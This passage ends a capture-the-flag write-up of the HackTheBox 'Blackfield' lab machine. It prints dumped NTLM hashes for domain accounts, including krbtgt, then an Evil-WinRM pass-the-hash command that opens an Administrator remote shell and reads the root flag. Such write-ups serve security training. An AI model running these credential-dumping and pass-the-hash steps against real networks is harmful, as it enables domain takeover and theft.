DC01$:1000:aad3b435b51404eeaad3b435b51404ee:65557f7ad03ac340a7eb12b9462f80d6:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:c95ac94a048e7c29ac4b4320d7c9d3b5:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
BLACKFIELD.local\BLACKFIELD764430:1105:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
BLACKFIELD.local\BLACKFIELD538365:1106:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
[...]
BLACKFIELD.local\BLACKFIELD438814:1412:aad3b435b51404eeaad3b435b51404ee:a658dd0c98e7ac3f46cca81ed6762d1c:::
svc_backup:1413:aad3b435b51404eeaad3b435b51404ee:9658d1d1dcd9250115e2205d9f48400d:::
BLACKFIELD.local\lydericlefebvre:1414:aad3b435b51404eeaad3b435b51404ee:a2bc62c44415e12302885d742b0a6890:::
PC01$:1415:aad3b435b51404eeaad3b435b51404ee:de1e7748b6b292bfff4fd5adb54b4608:::
[...]
[*] Cleaning up... 


I could try to crack the Administrator's hash, but remember that Evil-WinRM is our best friend, with the ability to authenticate with a hash, so...

in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
8******************************b
*Evil-WinRM* PS C:\Users\Administrator\Documents>


And so the root flag is mine too. Thanks again, and sorry if my habit of describing my failures has made this article longer, but I hope you can learn from them!

That's all folks, see you next time!

The awesome image used in this article is called Cholo Girl and was created by DGIM Studio.